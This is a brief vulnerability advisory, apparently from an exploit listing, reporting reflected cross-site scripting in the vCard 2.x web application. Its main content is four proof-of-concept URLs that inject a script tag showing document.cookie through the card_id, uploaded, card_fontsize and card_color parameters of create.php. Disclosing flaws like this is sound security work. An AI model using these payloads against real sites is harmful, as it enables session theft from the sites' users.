

| Risk |
Local |
| Remote |
| Low |
No |
| Yes |
Hello
Vulnerable: vCard 2.x
http://www.belchiorfoundry.com
Exploit :
http://example.com/vcard/create.php?card_id='><script>alert(document.coo
kie)</script>
http://example.com/vcard/create.php?uploaded='><script>alert(document.co
okie)</script>
http://example.com/vcard/create.php?card_fontsize='><script>alert(docume
nt.cookie)</script>
http://example.com/vcard/create.php?card_color='><script>alert(document.
cookie)</script>
Discovery by Linux_Drox
http://www.lezr.com
Best Regards
[ ASCII VERSION ]
|